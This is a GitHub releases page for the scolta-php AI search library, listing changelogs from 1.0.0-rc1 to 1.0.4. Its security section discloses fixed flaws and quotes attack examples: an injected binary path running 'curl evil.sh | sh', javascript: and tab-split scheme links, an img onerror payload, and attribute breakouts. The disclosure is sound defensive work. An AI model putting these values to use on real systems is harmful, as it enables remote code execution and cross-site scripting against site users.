Releases: tag1consulting/scolta-php
v1.0.4
Fixed
- AI sort-intent no longer fires on a hard sort word buried in a conversational/descriptive query (
src/Http/AiEndpointHandler.php,appendSortableFieldsInstruction()). Regression (terra-collecta, 2026-06-17): the query "I am looking for a gift for my friend who likes the cheapest handmade items" returnedsort_hint: {field: "price", direction: "asc"}— but "cheapest" there describes the items the friend likes, not a request to order results by price; the user wants gift ideas, not a price-sorted list. TheSORT INTENTprompt block already carried the buried-phrase/unsorted-list litmus guidance, but its only negative gift example used the soft qualifier "affordable", so the model let STEP 4's hard-word mapping (cheapest→ price asc) override the conversational frame. The prompt now adds an explicit hard-word buried negative example (the exact failing gift query) plus two STEP 3 descriptive-frame bullets, and states that a hard sort word (cheapest,most expensive,newest,oldest,longest, …) embedded in a conversational/descriptive frame is STILL NOT primary sort intent — the framing overrides the STEP 4 word→field mapping. STEP 4 fires only when ordering results is the query's whole point. This is an LLM-adherence fix: it tightens the prompt without changing the parser. The prompt-construction tests assert the new guidance strings are present; a committedtests/fixtures/sort-intent-eval.jsonbattery tracks the failing query, 3 buried-conversational variants (expectSort: null), and the true-positive controls (most expensive stone→price desc,cheapest crystals→price asc, barecheapest→price asc,pierres les moins chères→price asc,newest posts/latest news→date desc,oldest articles→date asc) — final verification is the browser regression re-run against the live model, since CI cannot drive the LLM deterministically. - Dev-only files no longer ship in the Composer dist archive (
.gitattributes,scripts/validate-dist-archive.sh).git archive HEAD(the tarball Composer downloads for a GitHub-hosted package) was still shippingphpstan.neon,phpstan-baseline.neon, and thetools/stemmer-goldenRust golden-data generator (a dev/CI-only stem oracle) to every Composer consumer: the PHPStan-config entry below claimed both neon files were excluded, but noexport-ignoreline backed the claim, andtools/was never excluded at all. Addedexport-ignorefor/phpstan.neon,/phpstan-baseline.neon, and/tools, so the published package is smaller and carries no dev tooling — none of the three is loaded at runtime (src/,templates/,assets/{js,css,wasm}are untouched). The dist-archive gate is tightened to match: the three move out of the top-level allowlist into the excluded-paths mirror, so the gate now asserts they are absent and any reappearance fails CI. - Auto-provisioned Amazee credentials stored without resolved model names no longer leave AI permanently broken (
src/AiProvider/Amazee/AutoProvisioner.php). Provisioning persists credentials and resolves model names as two non-atomic steps (AmazeeTrialProvisioner::provision()stores the token+url, then calls/model/info). When the model-info call fails,getAvailableModels()swallows the error and returns[], so the$onModelsResolvedgate never fires and no model name is persisted — butConfigStorageInterface::load()requires only token+url, so it reports the half-provisioned credentials as valid.ensureAiAvailable()then short-circuited onload() !== nullon every subsequent request and never re-resolved, so the caller fell back to the dated config default (claude-sonnet-4-5-20250929) which the Amazee LiteLLM gateway rejects with HTTP 400 "Invalid model name" — failing AI silently (summarize returns{}, expand returns an unexpanded 200) with no self-recovery. This is outsideKeyExpiryRecovery's remit, which handles only auth-class failures.ensureAiAvailable()now accepts an optional$hasResolvedModelspredicate: when stored credentials exist but the caller reports models are still unresolved, model resolution is re-attempted against the already-stored key (never a fresh trial, which would waste a server-limited allocation) and$onModelsResolvedfires with the result, so the incomplete-provision state self-heals on the next lazy-init pass. Without the predicate the historical no-op is unchanged. A regression test drives the full provision → failed-resolution → store → re-resolve sequence. (The dated-default fallback itself lives in the platform adapters' client construction, which adopt the predicate when they re-vendor.)
Security
- Configured Pagefind binary paths are now shell-escaped before execution (
src/Binary/PagefindBinary.php). Bothversion()and the internalisExecutable()probe interpolated the binary path directly intoexec($binary . ' --version 2>/dev/null'). The configured path can come from platform settings (admin forms, config files), so a value like/usr/bin/pagefind; curl evil.sh | shexecuted a second command. A new publicescapeShellCommand()helper appliesescapeshellarg()to the whole path, special-casing known multi-word commands (npx pagefindis split and escaped per token so it still runs as command + argument).downloadTargetDir()also now throws onmkdir()failure instead of silently returning a directory that was never created. Regression tests assert the composed command string for metacharacter, command-substitution, embedded-space, andnpx pagefindinputs — nothing is executed. - Markdown link URLs are scheme-gated on both renderers (
src/Util/MarkdownRenderer.php+formatInlineinassets/js/scolta.js). Both sides turned any[text](url)in AI output into a clickable link, so ajavascript:/data:URL in a model response (or via prompt injection through indexed content) became a live link; the JS side's domain allowlist only engaged whenallowedDomainswas non-empty, i.e. it failed open in the default configuration. Both renderers now allow only absolutehttp(s)URLs and scheme-less relative paths, rendering everything else as plain text. Control characters and whitespace are stripped before scheme detection because browsers ignore them when parsing a scheme (jav\tascript:executes). The JS side additionally attribute-escapes the href (the summary text is escaped withescapeHtml, which leaves"intact, so a quote inside an otherwise-allowed URL could previously break out of thehrefattribute). Covered by PHPUnit tests (javascript:,data:, tab-split scheme, relative and http(s) controls) and JSDOM Jest tests driving the real rendering path. - Attribute interpolations in
assets/js/scolta.jsuse a new quote-escapingescapeAttr(), and result-card hrefs are scheme-checked.escapeHtml()is atextContent → innerHTMLround-trip that does not escape quotes, but it guarded attribute contexts: the LLM-generated expanded terms indata-scolta-search-term="…", filter dimension/value attributes on dismiss buttons and checkboxes, and the result-titletitleattribute — a value containing"could close the attribute and mint new ones (e.g. event handlers). Result cards also interpolated the raw${url}into twohrefs, so a poisoned document URL likejavascript:…became clickable. Every attribute interpolation now usesescapeAttr()(escapes&<>"');escapeHtml()remains for text nodes. Result-card hrefs go throughsanitizeUrlAttr(), which attribute-escapes allowed (http(s)/relative) URLs and renders anything else as inert#. JSDOM Jest regression tests (tests/js/security-render.test.js) prove a"-bearing expanded term cannot break out of its attribute and ajavascript:result URL is not clickable. stripHtml()inassets/js/scolta.jsparses untrusted HTML in an inert document. It previously assigned untrusted excerpt/title HTML toinnerHTMLof a live detached<div>, whose subtree shares the page's document — resource-bearing elements (<img src onerror=…>) load eagerly there in real browsers. It now usesnew DOMParser().parseFromString(text, 'text/html').body.textContent, which neither runs scripts nor loads resources. A Jest test drives an<img onerror>payload through the real render path, plus a structural pin that the function stays DOMParser-based (the behavioral test alone cannot catch a revert in JSDOM, which loads no resources either way).FilesystemDriver::deleteDirectory()no longer follows symlinks (src/Storage/FilesystemDriver.php). The delete loop calledrmdir/unlinkon$item->getRealPath(), which resolves symlinks — deleting a retired index tree containing a planted (or accidental) symlink deleted the link target, potentially outside the tree (the recursive iterator does not follow links for traversal, but realpath re-introduced the hop at delete time). The loop now operates ongetPathname()and unlinks links themselves (isLink()checked before the dir/file branch, sinceisDir()follows links too). A regression test builds a tree containing symlinks to an outside file and an outside directory and asserts both targets survive deletion.exists()also now callsvalidatePath()— it was the only driver method skipping the stream-wrapper guard every sibling applies.- Follow-up conversations enforce content-size caps (
src/Http/AiEndpointHandler.php).handleFollowUp()validated roles and the message cadence but no sizes, while its sibling endpoints cap the query at 500 bytes and summarize context at 100k — a client could relay arbitrarily large payloads straight to the AI provider. Each message's content is now capped at 100,000 characters (mirroring the summarize context safety net, since the first user turn legitimately embeds search context) and the conversation total at 400,000 characters, both returning HTTP 400. The caps are measured in Unicode characters via `m...
v1.0.3
Added
- Regression snapshot test pinning the
summarizeCORPUS AWARENESS prompt bullet. A new test (testSummarizeCorpusAwarenessMatchesCanonicalSnapshot) readstests/fixtures/corpus-awareness-bullet.txtand asserts the resolved'summarize'template (DefaultPrompts::getTemplate()) contains that exact bullet byte-for-byte, guarding against silent drift (follow-up to the tag1consulting/scolta-core#33 corpus-statistic fix). The fixture is kept hand-identical to the matching bullet in scolta-core'sSUMMARIZEconstant. Test-only; no runtime change. - Category-member and context decomposition rules in the default
expand_queryprompt (tag1consulting/scolta-core#36). The'expand_query'template (resolved server-side byDefaultPromptsfor the AI path) gains two rules so the model decomposes a grouping into concrete terms instead of restating it as an abstract synonym: rule 13 (CATEGORY → MEMBERS) expands a category/family/region into its well-known members ("version control systems" → Git/Mercurial/Subversion; "Southeast Asian food" → Thai/Vietnamese/Indonesian), and rule 14 (CONTEXT / USE-CASE → CONCRETE ITEMS) expands a context/occasion into the item types that serve it ("home office setup" → standing desk/ergonomic chair/monitor arm). Both lead with non-food examples so the behavior generalizes across domains, and rule 13 forbids fabricating members for categories the model does not know — those fall back to normal alternate phrasings. The 2-4 term cap is reconciled to allow up to 6 concrete members when decomposing, and rule 7 is narrowed to taxonomy/filter-label matching so it no longer contradicts rule 13. Additive: queries that are not categories or contexts expand exactly as before. The template is byte-identical to scolta-core'sEXPAND_QUERYconstant; the browser-side WASM must be rebuilt downstream to match. - Round-robin AI-summary candidate selection across expansion sub-queries (#170). When a query fans out into distinct sub-topics of unequal corpus size (e.g. "traditional dishes from Southeast Asia" → Thai, Vietnamese, Indonesian, …), the relevance-union top-N that feeds the AI summarizer is filled entirely by the single largest sub-query, so the overview can only ever describe that one sub-topic. Two new browser-side config keys address this:
expansionCombineMode(relevance_uniondefault |round_robin) andexpansionPerTermTopK(default3). Underround_robin,scolta.jsstamps each loaded result with the expansion sub-query that produced it (__scoltaSourceTerm), groups the summary candidate pool by that provenance, and deals the top-K from each sub-query in turn untilaiSummaryTopNis filled — so the summarizer sees breadth across sub-topics. The reallocation stays within the existingaiSummaryTopN/aiSummaryMaxCharsbudgets and never exceeds them. The defaultrelevance_unionreproduces current behavior exactly, and the visible ranked result list is unchanged (always relevance-sorted) — round-robin only affects what the summarizer is shown. A single-sub-query pool (focused single-intent query) is identical torelevance_union. ConfigReferenceDocTest— a CI guard that keepsdocs/CONFIG_REFERENCE.mdin sync withScoltaConfig. The new test parses the property tables and preset table inCONFIG_REFERENCE.mdand asserts that every documented scalar default equals the liveScoltaConfigdefault, that every scalar property is documented, and that every non-default preset override is documented with a matching value. It fails loudly if the tables can no longer be parsed, so a future doc reformat surfaces as a fixable failure rather than a silently-skipped check. This is the guard that would have caught the README default drift fixed in this release. The test also pinsdocs/TUNING.md: that guide restates the current global default for each scoring parameter it discusses (its**Config:** … — **Default: X**lines), and those restatements can drift independently ofCONFIG_REFERENCE.md, so a newtest_documented_tuning_guide_defaults_match_live_configasserts each one equals the liveScoltaConfigdefault too.docs/TUNING.md— the canonical scoring-tuning evidence guide. Opens with a plain "choose your site type → preset" section for admins, then the full scoring-sweep evidence (precision-cliff data, per-parameter sweeps, methodology, and which defaults are still open findings) for maintainers. Cross-linksCONFIG_REFERENCE.mdfor the property list and the site-type → preset table rather than duplicating them;CONFIG_REFERENCE.md's preset section now links back to it.assets/ASSETS.sha256manifest covering all duplicated front-end assets. The four browser assets duplicated into scolta-drupal and scolta-wp (js/scolta.js,css/scolta.css,wasm/scolta_core.js,wasm/scolta_core_bg.wasm) are now hashed into a single manifest, regenerated by the newcomposer update-asset-manifestscript. The adapters drive both their dev-time copy and their CI drift guard from this one manifest, so a newly added asset can no longer be guarded in one place and forgotten in another.update-browser-wasmnow regenerates the manifest after copying the WASM. The existing per-fileassets/js/scolta.js.sha256is retained (scolta-laravel'sHealthControllerandStatusCommandread it at runtime as a bare hash) but is now derived fromASSETS.sha256rather than hashed independently:update-js-checksumregenerates the manifest and then extracts thejs/scolta.jsline into the standalone file, so every asset SHA-256 comes from one computation and the two files can never diverge. A newAssetManifestTestfails CI if the committed manifest is stale, any listed asset is missing, the standalone checksum drifts from the manifest'sjs/scolta.jsline, or that file stops being a bare 64-hex hash.AiServiceAdapter::handlePossibleBudgetException()hook. The basemessage(),conversation(), andmessageForOperation()methods now wrap their AI call in atry/catch (\RuntimeException)that invokes a new protectedhandlePossibleBudgetException()hook before re-throwing. The base hook is a no-op, so behavior is unchanged for callers; platform adapters (scolta-drupal, scolta-laravel, scolta-wp) override it to convert an Amazee budget-exhaustion error intoAmazeeBudgetExceededException(and notify a budget handler) without each having to override all three AI methods. This removes the need for the three near-identical try/catch overrides duplicated in every adapter. Backward-compatible: an un-updated adapter that still overrides the three methods keeps working because the wrapper exception's message does not contain theBudget has been exceeded!guard string, so the doubled hook call is an idempotent no-op on the second pass.
Fixed
fromArray()now treatsnullas "not set," so adapters can fall through to a Site Type preset. The override loop previously assigned every key present in the input over the preset's values, with no way to express "this field is unset — use the preset." Adapters that omit a key (Drupal, WordPress) got preset fall-through for free, but an adapter whose config layer always emits a key for every field (notably Laravel'sconfig/scolta.php) could never reach a preset's value — its concrete config default always won, leaving the entire Site Type preset (~12–15 scoring/display fields, not justexpansionCombineMode) inert.fromArray()now skips anynullvalue (null= "not set" → use the preset, or the base default when no preset is named); an explicit non-null value still overrides. This makes the unset contract explicit for every adapter and removes a latentTypeError(assigningnullto a typed property previously threw). This is the central fix that enables adapters — especially Laravel — to honor presets; the Laravel config defaults switch tonullin its own PR.CONFIG_REFERENCE.mddocuments the contract in prose.- AI summaries no longer truncate mid-sentence on multi-item results (#168).
aiSummaryMaxTokensdefaulted to512, butmax_tokensis a hard ceiling, not a target — a 6-item summary with one-sentence descriptions plus ad-hoc subcategory headers overran it and was cut at the token boundary mid-word. Two complementary fixes: the default is raised to1024(the prompt structurally bounds real output to ~300–600 tokens, so this adds headroom without inviting longer output), and the'summarize'template's FORMAT RULES now state an explicit output-length budget — keep the summary under ~150 words, with a single flat bulleted list and no section/sub-category headers. The raised ceiling guarantees nothing is cut; the stated budget keeps natural output short. No preset overridesai_summary_max_tokensbelow the default. The prompt line matches scolta-core'sSUMMARIZEconstant. - Removed the Wikipedia-specific corpus statistic from the default
summarizeprompt. TheCORPUS AWARENESSrule in the'summarize'template shipped a hard-coded "~6,900 Featured Articles" example that described only the Wikipedia demo, reached every site using the default prompt (the server resolves this template for the AI overview), and taught the model to fabricate corpus counts. The example is now count-free and frames gaps via the site description's scope, and the rule explicitly forbids inventing statistics (counts, totals, sizes). Matches the same change in scolta-core'sSUMMARIZEconstant (tag1consulting/scolta-core#33).
Changed
- **Facet panel is now index-driven and static, with exact typed-query counts that don't move on AI expansion or when you click a fac...
v1.0.2
Removed
- Reverted the entire query-word-importance line (#163 exemption + #164 ranking). Validation showed both layers were inert — the #164
incidentalMatchWeightre-ranking and the #163 semantic exemption gate changed result ordering on zero real queries. Removed: thequery_word_importanceplumbing into the WASMscore_resultsinput and the JS fallback weighting, theincidentalMatchWeightconfig, theaiQueryWordImportanceflag, the expand-prompt classification instruction and itsquery_word_importanceparsing inAiEndpointHandler, thecontentWordsexemption gate inscolta.js, and the bundled WASM that carried the scoring weight. The #156 frequency guard (#161) and the Fix A/D typed-query-term exemption +expandSubwordDenyListveto (#162) are unchanged — the browser tree is back to its #162 state, with the bundled WASM matching the reverted scolta-core.
Fixed
- Sub-word frequency guard no longer drops words the user actually typed (#156 follow-up). The #156 guard used corpus frequency as a proxy for "non-discriminating / generic," but in a topical corpus a word is often high-frequency because it is the subject matter — the proxy conflates "common because central" with "common because generic." So searching
spicyon a recipe corpus had its typed subject word (~6.4% of docs, above the0.05/0.10threshold) silently dropped from the decomposed expansion terms, collapsing recall. The frequency check is now bypassed for any sub-word that is a token of the user's actual query (Fix A), with a per-siteexpandSubwordDenyListveto for the rare word that is both typed and genuinely generic (Fix D). Non-query expansion-derived words (e.g.fried,tender) remain frequency-gated as before. customStopWordsnow applied consistently inscolta.js(#156 follow-up).extractSearchTerms()previously filtered against only the built-inSTOPWORDSset, so JS query tokenization ignoredcustomStopWordswhile the WASM scorer honored it. JS now strips the union ofSTOPWORDSandcustomStopWords, matching WASM.- Broad multi-word queries recover the recall lost in v1.0.0 (closes #156). Commit
690a2288removed the sub-word expansion block fromscolta.js, causing broad-query result counts to drop 4–50× on high-overlap corpora. Sub-word expansion is reintroduced behind a corpus-frequency guard: a multi-word expansion term's constituent words are added as search terms only when each word's corpus frequency is belowexpandSubwordMaxFrequency(default0.05;0.10for thecontent_catalogandnonepresets). This restores low-frequency domain words ("vegetarian", "cuisine") while blocking high-frequency noise ("recipes", "cooking") that polluted pre-v1.0.0 results. Frequency is measured against the same active filters the search uses (including the language partition whenautoLanguageFilteris on), so the denominator matches the corpus actually being searched. The guard applies in both the relevance and native-sort code paths. Setting the threshold to0reproduces v1.0.0 (no sub-words);>= 1.0reproduces the pre-v1.0.0 behavior (all sub-words).
Added
expandSubwordDenyListconfig option (default[]). Guard-only veto list for the sub-word query-term exemption (#156 follow-up). Words here are never auto-exempted from the sub-word frequency guard even when the user types them, so a site can stop a typed generic word (e.g.hoton a recipe corpus) from re-flooding results via the exemption. UnlikecustomStopWordsthis does NOT affect relevance scoring or query tokenization — the word stays searchable and scorable. Configurable viaexpand_subword_deny_listin all platform adapters.expandSubwordMaxFrequencyconfig option (default0.05). Maximum corpus frequency (fraction of indexed documents) for a multi-word expansion term's constituent word to be added as a standalone search term. Configurable viaexpand_subword_max_frequencyin all platform adapters. Presetscontent_catalogandnoneship0.10;reference,ecommerce, andbloguse the0.05default. Set to0to disable sub-word expansion entirely.- Result-count baseline regression test (
tests/js/result-count-baseline.test.js+tests/fixtures/result-count-baseline.json). Drives the realscolta.jsguard against a synthetic corpus built from real measured frequencies and asserts merged result counts stay within a per-demo band, flagging both recall collapse (sub-word block removed) and precision spikes (high-frequency noise admitted). This is the regression guard whose absence let690a2288ship a silent count drop. - Sub-word frequency guard behavioral test (
tests/js/subword-frequency-guard.test.js). Executesscolta.jsagainst a recording Pagefind mock and asserts only sub-words below the threshold feed results, covering the boundary behaviors (0and>= 1).
Changed
- Opened 1.0.2-dev development cycle.
- Scoring default tuning from the full-matrix sweep (120+ queries, 9 demos).
crossListBonusdefault0.15->0.05(a smaller tie-breaker that doesn't override single-source precision);recencyBoostMaxdefault0.5->0.25, with preset overridesreference: 0,content_catalog: 0, andblog: 0.25(recency adds noise on non-time-sensitive content);titleMatchBoostdefault1.0->2.0(improves top-1 precision across all demos; already shipped in thereference/content_catalogpresets). These are ranking-quality changes independent of the #156 recall fix.
v1.0.1
Fixed
- Binary indexer now emits canonical URLs instead of build-artifact URLs.
ContentExporterwrites exported HTML files in a nested directory structure mirroring the canonical URL (/recipe/cake/→recipe/cake/index.html) so Pagefind--sitederivesdata.urlidentical to the PHP indexer. Previously, flat{id}.htmlexports causeddata.url = /{id}.html— a path that 404s on the live site. Resolves the root cause behind #155 and closes #157. - AI summary citation URLs now prefer canonical
meta.urlover Pagefind file path. BothsummarizeResults()(WASM path) andbuildLLMContext()(JS fallback) now user.data.meta?.url || resolveUrl(r.data.url), matching the pattern already used in the result card renderer. Fixes #155. - Added
vendor/toarchive.excludeincomposer.jsonto prevent devvendor/from leaking into dist archives when installed via Composer path repositories.
Added
ContentExporter::urlToExportPath()— maps a canonical URL to the export file path Pagefind will crawl. Shared by all platform adapters.ContentExporter::countHtmlFiles()— recursive HTML file count, replacing flatglob('*.html')in adapters.ContentExporter::writeManifest()/readManifest()— ID-to-path manifest for incremental deletes in the nested layout.ContentExporter::deleteById()/deleteByUrl()— delete export files by item ID (manifest + flat fallback) or canonical URL.- Indexer URL parity test (
IndexerUrlParityTest) that joins fragments by stable item ID and assertsdata.urlequality, collision detection, andurlToExportPathmapping correctness. - Citation URL structural tests in JS test suite — locks the
meta.url ||fallback pattern in both summary builders.
Documentation
- Clarified independent versioning model. CLAUDE.md, CHANGELOG.md, and UPGRADE.md now state that minor and patch versions are released independently per package, with adapters pinning scolta-php via
composer.lockwithin their^1.xconstraint. Added a comment toscripts/check-version-sync.phpnoting it is a local-only major check.
Upgrade notes
Binary-indexer sites must run a full rebuild after upgrading. The export layout changed from flat {id}.html to nested directories mirroring canonical URLs. A stale index will retain the old /{id}.html URLs that 404 on the live site. The health-check warning added in #158 will surface a pre-fix index automatically.
Scolta 1.0.0
Scolta 1.0.0
AI-powered search for Drupal, WordPress, and Laravel — now stable.
What is Scolta?
Scolta is an open-source, AI-powered search platform that replaces the default search on Drupal, WordPress, and Laravel sites with intelligent, semantic search. It uses a Rust/WASM core for scoring, query expansion, and relevance ranking, with a shared PHP library and thin CMS-specific adapters. Scolta is built by Tag1 Consulting and powered by Amazee.ai for AI infrastructure.
scolta-php is the shared PHP library that all CMS adapters depend on. It provides the PHP indexer, AI summary with streaming, query expansion, filter/sort infrastructure, and content management layer that powers every Scolta installation.
1.0.0 Stable Release
This is the foundation library that Drupal, WordPress, and Laravel packages build on. Highlights of the stable release:
- PHP indexer with no binary dependency — index content using pure PHP
- AI summary with streaming for real-time answer generation
- expand_query with disambiguation for intelligent query rewriting
- Filter/sort infrastructure with two-pass matching, subcategory support, and price sort patterns
- Memory pressure handling with stream tokenization for large sites
- API error handling (401/429/503) with graceful degradation
- Amazee.ai provider support for managed AI infrastructure
- E2E test suite covering the full search pipeline
Changes Since RC4
Search Quality
- Subcategory matching in filter field descriptions
exactTitleMatchBoostconfig option for precise title relevancecrossListBonusconfig option for multi-index scoring- Expansion merge cross-list bonus scoring
- Expansion phrases no longer word-exploded
- Sort-intent fallback when Pagefind returns few results
- Sort-without-filter fallback
- Sort intent no-fallback rule
Filters and Facets
- Filter exact-match-first (two-pass matching)
filter_hintcanonicalization against Pagefind filters- Ascending price sort patterns recognized
- Subject filter UI state updates (badges + checkboxes)
- Multi-value filter array counting fix
- Multi-value facet OR syntax fix
- Facet count refresh after filter selection
- Filter+sort discovery replacing intersection heuristic
AI Overview
- AI Overview italic/bold+italic markdown rendering
- Corpus-awareness in summarize/follow-up prompts
- AI Summary reflects user-selected facet filters
- StreamingFormatWriter multi-value filter fix
Indexer
- PHP indexer memory reduction (stream tokenization)
- Index completeness verification on exit
- PhpIndexer sortable/metadata passthrough fix
- Memory regression test for
processChunk()
Infrastructure
- Filter field description validation test
Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0/CHANGELOG.md
Getting Started
composer require tag1/scolta-phpMost users will install one of the CMS-specific packages (scolta-drupal, scolta-laravel, or scolta-wp), which pull in scolta-php automatically.
Scolta 1.0.0-rc4
Scolta 1.0.0-rc4
Fourth release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.
Highlights
Fixed
- Expand-query prompt disambiguation — Rule 9 now uses the site's domain context to disambiguate multilingual queries before falling back to generic interpretation. A German query like "Zweig" on a Git docs site is now expanded to branch-related terms instead of famous authors.
- Composer archive excludes tests/ —
composer.jsonarchive.excludeprevents ~4 MB stemmer corpus and fixtures from shipping in dist archives. - API error handling —
AiClientnow throwsApiKeyInvalidException(401) andRateLimitException(429 +Retry-Afterheader) instead of wrapping all upstream errors as generic 503. - E2E test race condition —
uniqid()collision on multi-vCPU CI fixed by appendinggetmypid()to state-directory names. - Foreign language "No Results Found" flash — UI now suppresses premature empty-state display while AI expansion is still translating/expanding the query.
- Follow-up queries resolve numbered result references — "#6", "the third one", etc. now map to the correspondingly numbered entry in search context.
- Sort-intent prompt restructured as a 4-step decision sequence to eliminate false positives (discovery qualifiers) and false negatives (adverb+participle recency forms).
Added
showAttributionconfig option — opt-in "Powered by Scolta" display (defaultfalse), per WordPress.org Guideline 10..gitattributesexport-ignore — dev files (tests/, .github/, benchmarks/, scripts/) excluded fromgit archivedistributions.- AI Overview metadata enrichment — structured metadata per result with sort/filter indicators in LLM context.
- Generic sort and filter prompt infrastructure —
sortableFieldDescriptions,filterFields,filterFieldDescriptionsconfig properties. - Memory pressure handling —
gc_mem_caches()on PHP 8.3+, RSS-based 75% threshold voluntary restart. - Sort override subject filter — parallel subject-only search intersects with sorted results to prevent irrelevant items.
- Pagefind native sort — sort hints now use Pagefind's index-level sort instead of client-side reranking.
- Auto date sortable field —
ContentItem::$dateautomatically included in sort attributes. ContentItem::cloneWith()— safe field-level overriding without silent field loss.- Multi-value filter support in
PagefindHtmlBuilder.
Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc4/CHANGELOG.md
⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues
Scolta 1.0.0-rc3
Scolta 1.0.0-rc3
Third release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.
Highlights
- Fixed inverted
expand_primary_weightmerge semantics. The WASM N-set merge was applying the configured weight to expanded results instead of original results, inverting the documented behavior.expand_primary_weight: 0.9now correctly gives original query results 90% weight and expansion results 10%. expandPrimaryWeightnow included in expand-query API response payload.
Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc3/CHANGELOG.md
⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues
Scolta 1.0.0-rc2
Scolta 1.0.0-rc2
Second release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.
Changes since rc1
update-js-checksumcomposer script. Regeneratesassets/js/scolta.js.sha256after editing the canonical JS file:composer run update-js-checksum.scolta.jsauto_language_filter now overrides stale URLf_languageparams on language switch.- Pagefind filter index CBOR structure corrected to match Pagefind CLI output. Any filter-based search returned 0 results with the previous structure.
ScoltaConfig::fromArray()now coerces string values to the correct PHP type before assignment. FixesTypeErrorcrash on Drupal sites usingdrush config:set.ScoltaConfig::$aiSummaryMaxTokensdefault restored to512.ScoltaConfig::$autoLanguageFilteradded (defaultfalse). Language filter is now opt-in.scolta.jsfilter sidebar counts restored fromcomputeFilterCounts(allScoredResults).autoindexer now always means PHP on all code paths.
Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc2/CHANGELOG.md
⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues
Scolta 1.0.0-rc1
First stable release — all features from 0.3.x promoted to 1.0 API surface.
Fixed
scolta.jsinitPagefind()now uses a module-levelpagefindInstanceguard to prevent callingpagefind.init()more than once per page. Pagefind uses a SharedWorker that persists across navigations; callinginit()a second time (e.g. on Drupal behavior re-attachment after a language switch) corrupts the WASM pointer permanently, causing "No pointer" errors and zero search results for the remainder of the tab session. The guard is stored in the outer IIFE scope so it spans allcreateInstance()calls on the same page.- Summarize endpoint no longer returns HTTP 400 on large result sets. The
contextparameter validation limit has been raised from 50,000 to 100,000 characters. The client truncates to 49,000 characters before sending, so this server-side limit acts as a safety net only. IndexBuildOrchestratornow reports failure when the atomic swap or post-build sanity check fails. Two silent failure modes are closed: (1)atomicSwap()now throwsRuntimeExceptionif anyrename()call returns false, so a failed filesystem rename can no longer cause a false-success result; (2) after the swap,verifyOutputHasFragments()checks that the pagefind output directory contains at least one.pf_fragmentfile when pages were processed — zero fragments after a non-empty build is treated as a hard failure. Both errors surface through the existing try/catch and are returned assuccess: falsewith a descriptiveerrorstring. (scolta-php#46)ContentExporter::filterItems()no longer crashes onCachedContentReferenceobjects during re-index. When a prior build's timestamp manifest exists,gather()yields a mix ofContentItemandCachedContentReferenceobjects (cache-hit markers for unchanged posts).filterItems()previously accessed$item->bodyHtmlon every item, which is not a property ofCachedContentReference. Addedinstanceof CachedContentReferencetype guard to pass cached items through without inspection. Fixes PHP fatal error on WordPress and any other platform on any site with a prior build.- AI summary
max_tokensraised from512to1024. The previous limit caused the AI to truncate mid-markdown on multi-result summaries — the last result was particularly vulnerable. The new default halves truncation frequency. The value is now configurable viaScoltaConfig::$aiSummaryMaxTokens. cleanBrokenMarkdown()added toscolta.jsbeforeformatSummary()renders markdown to HTML. Mirrors the existing PHPMarkdownRenderer::cleanBrokenLinks()salvage logic: unclosed markdown links become bold text, unclosed bold/italic/backtick delimiters are closed. Prevents truncated AI output from producing broken HTML in the browser.AiClientnow auto-appends/v1/chat/completionsto OpenAIbase_urlvalues that have no path. LiteLLM proxies (including Amazee.ai) return a base URL without a path component. Passing that URL directly caused405 Method Not Allowederrors. When thebase_urlhas no path (or only/), the standard OpenAI chat completions path is appended automatically. URLs that already contain a path are used as-is.AmazeeClient::provisionTrial()andsignIn()now parse the nested API response format, and token validation is removed from the provisioning path. The Amazee.ai/auth/generate-trial-accessendpoint now returns credentials nested under akeyobject, andsignInwraps the access token under atokenobject. Both methods now check for the nested format first and fall back to the legacy flat format for backwards compatibility. The post-provisioningvalidateToken()call is removed fromprovisionTrial()because the/auth/meendpoint no longer exists on Amazee.ai's LiteLLM proxy — the token issued by the provisioning API is trusted directly.scolta.jsresult URLs resolved against pagefind base path instead of site root.pagefindBasewas stored as an absolute URL (with origin), butpagefind.jsreturns root-relative URLs after applying itsbaseUrl(a path, not an origin). The startsWith check never matched, so the pagefind prefix was never stripped — result links pointed to/wp-content/uploads/scolta/pagefind/product/…instead of/product/….pagefindBaseis now stored as a path-only value by stripping the origin vianew URL().pathnamewhen the pagefind path is absolute.Adapter install — DrupalCI job failed because the release-validation workflow replaced the entirerepositoriesarray (wiping thepackages.drupal.org/8Drupal Packagist entry) instead of only swapping the local path repo for the GitHub VCS repo. The PHP inline script now filters out only thepath-type scolta-php entry and appends the VCS repo, leaving other repository sources (including the Drupal Packagist) intact.- Search status message text no longer overflows on narrow viewports.
.scolta-results-headernow carriesoverflow-wrap: break-wordandword-wrap: break-word, and its first-child<span>gainsmin-width: 0so the flex item can shrink below its content size. Long messages (e.g. "— no exact matches found, showing partial matches") wrap correctly at 320 px, 768 px, 1024 px, and 1440 px viewport widths. (#51) - Memory profile documentation claimed "peak RSS ≤ 96 MB" for the conservative profile, but 96 MB is Scolta's internal allocation budget — total process RSS also includes the PHP runtime baseline (typically ~60 MB for Laravel CLI, ~80 MB for WordPress, ~130 MB for Drupal) and I/O overhead. PHPDoc for
MemoryBudget::conservative(),MemoryBudgetSuggestion::suggest()reason strings, andcheckProfileFit()warning messages now use "internal allocation budget" rather than "peak RSS". The README Memory and Scale section is updated with a platform baseline table and corrected estimates for total expected RSS per profile. The balanced and aggressive README comments ("~200 MB peak RSS" and "~384 MB peak RSS") are corrected to match the actual internal budget values (384 MB and 1 GB). (scolta-php#47) HealthCheckerno longer reportsai_configured: truewhen the API key is whitespace-only. The previous!empty()check treated strings containing only spaces or tabs as configured. Changed totrim() !== ''so only non-empty, non-whitespace keys (including Amazee.ai tokens stored as the API key) report as configured.- AI endpoints return HTTP 200 with empty data instead of 503 when no API key is configured. A new
